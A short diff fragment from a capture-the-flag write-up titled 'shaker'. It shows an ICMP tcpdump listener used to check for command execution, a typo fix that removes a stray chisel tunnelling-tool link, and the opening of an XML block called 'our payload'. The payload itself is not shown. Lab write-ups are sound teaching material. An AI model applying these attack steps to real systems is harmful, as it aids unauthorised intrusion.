Omega-Void/omega-void.github.io/content/writeups/shaker.md

 sudo tcpdump -i tun0 icmp
 ```

-And finally whttps://github.com/jpillora/chisele upload our payload:
+And finally we upload our payload:

 ```xml
 <?xml version="1.0"?>